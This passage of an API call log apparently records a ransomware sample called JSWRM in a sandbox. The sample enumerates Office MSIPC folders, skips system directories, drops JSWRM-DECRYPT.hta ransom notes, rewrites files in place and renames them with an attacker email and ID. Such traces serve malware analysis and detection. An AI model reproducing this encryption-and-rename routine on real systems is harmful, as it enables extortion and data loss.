lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\nl\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.768] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22680) returned 1 [0136.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.768] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5890, lpOverlapped=0x0) returned 1 [0136.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.771] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5890, lpOverlapped=0x0) returned 1 [0136.771] CloseHandle (hObject=0x314) returned 1 [0136.771] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\nl\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\nl\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\nl\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.772] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf2dd35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf2dd35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb43ee0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.772] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0136.772] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="no", cAlternateFileName="")) returned 1 [0136.772] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0136.772] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0136.772] lstrcmpiW (lpString1="no", lpString2="...") returned 1 [0136.772] lstrcmpiW (lpString1="no", lpString2="windows") returned -1 [0136.772] lstrcmpiW (lpString1="no", lpString2="recovery") returned -1 [0136.772] lstrcmpiW (lpString1="no", lpString2="perflogs") returned -1 [0136.772] lstrcmpiW (lpString1="no", lpString2="documents and settings") returned 1 [0136.773] lstrcmpiW (lpString1="no", lpString2="$RECYCLE.BIN") returned 1 [0136.773] lstrcmpiW (lpString1="no", lpString2="system volume information") returned -1 [0136.773] lstrcmpiW (lpString1="no", lpString2="msocache") returned 1 [0136.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\no\\jswrm-decrypt.hta")) returned 0xffffffff [0136.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\no\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.777] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.777] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.778] CloseHandle (hObject=0x238) returned 1 [0136.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\no\\jswrm-decrypt.hta")) returned 0x20 [0136.778] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x482fc086, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232040 [0136.779] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.779] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x482fc086, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.779] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.779] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.779] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x482fc086, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x482fc086, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x482fc086, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.779] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.779] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.779] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.780] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.780] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.780] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\no\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.780] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.781] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.781] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.783] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.784] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.784] CloseHandle (hObject=0x314) returned 1 [0136.784] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\no\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\no\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\no\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.785] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.785] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0136.785] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="pl", cAlternateFileName="")) returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="...") returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="windows") returned -1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="recovery") returned -1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="perflogs") returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="documents and settings") returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="$RECYCLE.BIN") returned 1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="system volume information") returned -1 [0136.785] lstrcmpiW (lpString1="pl", lpString2="msocache") returned 1 [0136.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pl\\jswrm-decrypt.hta")) returned 0xffffffff [0136.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.795] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.795] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.796] CloseHandle (hObject=0x238) returned 1 [0136.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pl\\jswrm-decrypt.hta")) returned 0x20 [0136.796] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69259a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x483258c0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0136.796] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.796] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69259a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x483258c0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.796] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.797] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.797] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x483258c0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x483258c0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x483258c0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.797] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.797] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69259a9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69259a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.797] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 